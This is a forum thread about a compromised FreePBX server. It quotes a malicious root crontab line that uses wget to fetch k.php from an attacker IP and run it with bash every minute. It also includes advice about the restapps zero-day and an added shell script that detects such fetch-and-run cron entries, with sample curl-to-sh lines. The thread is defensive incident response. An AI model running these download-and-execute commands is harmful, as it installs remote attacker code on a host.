December 25, 2021, 4:58pm
I received a warning from my telephone company today about possible unauthorized international calls from my PBX.
While looking into the installation I stumbled upon the following root crontab entry:
*/1 * * * * wget http://220.127.116.11/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
The IP address has no reverse DNS and according to whois belongs to a company in the Netherlands. Also, the downloaded k.php looks quite fishy.
FreePBX installed from SNG7-PBX16-64bit-2105-7.iso
December 25, 2021, 5:21pm
Yes, your system has been hacked. Don’t try to clean it up. Reinstall a clean .iso and restore from a backup taken before the attack. Most likely, the cause is
On the afternoon of December 21, 2021 Sangoma received a report of malicious activity in progress on a fully up to date FreePBX 15 system. Technical details followed very quickly, and engineering was able to act within minutes of the report. Investigation revealed the vulnerability to be in the FreePBX and PBXact Phone Apps (restapps) module, in published versions 18.104.22.168, 22.214.171.124, 126.96.36.199 and 188.8.131.52. Other major FreePBX or PBXact versions are not affected. The affected module …
See also this discussion:
I was made aware of a new zero-day FreePBX exploit today - apparently it affects Phone Apps, even if you’re not using Phone Apps in a licensed capacity.
Does anyone have any information on this? Apparently, an earlier post on the subject was pulled down? Do we have any sort of statement from Sangoma or an ETA for a security fix? Should we be closing down the public facing Phone Apps port for all customers?
If your system had been updated to one of the vulnerable versions, it is almost certain that this is what happened.
To reduce the chance of similar incidents in the future, ensure that any kind of web access to the PBX (admin, UCP, REST, etc.) is restricted to whitelisted IP addresses.
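As an added example (not part of the original thread, and not FreePBX or Sangoma code), the following POSIX shell snippet turns the indicator from the first post into a quick check: a cron entry that downloads a file with wget or curl and immediately runs it through bash or sh, the `wget ... -O <path>;bash <path>` shape seen in the compromised root crontab. The matching heuristic, the function names and the sample crontab lines (with a documentation-range IP in place of the real one) are all constructed for this example.

```shell
#!/bin/sh
# Added example: flag crontab lines that fetch a remote file and execute it.
# Heuristic (an assumption of this example, not an authoritative IOC list):
#   1. the line invokes wget or curl and either writes to a file
#      (-O / -o / --output) or pipes the download onward, and
#   2. the same line hands the result to bash or sh after ; | or &&.
# Reads crontab text on stdin, prints each suspicious line prefixed "SUSPECT:".
scan_cron_text() {
  grep -v -E '^[[:space:]]*(#|$)' |
  grep -E '(wget|curl)[^;|]*(-O|-o|--output|\|)' |
  grep -E '(\||;|&&)[[:space:]]*(/bin/)?(bash|sh)([[:space:]]|$)' |
  sed 's/^/SUSPECT: /'
}

# Gather every place cron jobs live on a typical CentOS/SNG7-style host and
# run the scan over all of them. Missing files are skipped silently so the
# function can be run on any box; invoke it by hand as root.
scan_system_cron() {
  {
    crontab -l 2>/dev/null
    cat /etc/crontab /etc/cron.d/* /var/spool/cron/* 2>/dev/null
    # one-shot scripts dropped into the hourly/daily directories
    cat /etc/cron.hourly/* /etc/cron.daily/* 2>/dev/null
  } | scan_cron_text
}

# Constructed sample crontab used to demonstrate the check offline.
SAMPLE_CRONTAB='# constructed sample crontab (not from a real system)
*/1 * * * * wget http://198.51.100.23/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://198.51.100.23/x.sh | sh
30 2 * * * wget -q -O /tmp/report.csv https://example.invalid/report.csv'

# Returns the number of suspicious entries in the sample.
sample_hit_count() {
  printf '%s\n' "$SAMPLE_CRONTAB" | scan_cron_text | wc -l | tr -d ' '
}
```

Run `scan_system_cron` as root on a box you suspect; any output is a reason to treat the host as compromised and follow the reinstall-from-clean-ISO advice above rather than deleting the cron line. The fourth sample line (a plain wget that only saves a file) is deliberately not flagged, which is the limit of the heuristic: a downloader that writes a script for a separate cron job to run later will not match, so read the output of `crontab -l` in full as well.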
December 25, 2021, 5:31pm
Thank you very much. I will do a fresh install. Obviously, I must also consider my configured SIP passwords stolen and will need to change them.
December 26, 2021, 1:37pm
Just to make sure: Is SNG7-PBX16-64bit-2112-4.iso (downloaded yesterday) already patched against this exploit?
December 26, 2021, 2:05pm
Looking at the release notes it was released before the patches. Full ISOs aren’t usually released that often. I would suggest running all updates anyway before restoring any backup or putting into production as part of any install.
December 26, 2021, 2:37pm
Thanks for quick reply
fwconsole ma upgradeall
Anything else to update?
December 26, 2021, 2:38pm
Remember to do a reload after updating.
January 25, 2022, 2:39pm
This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.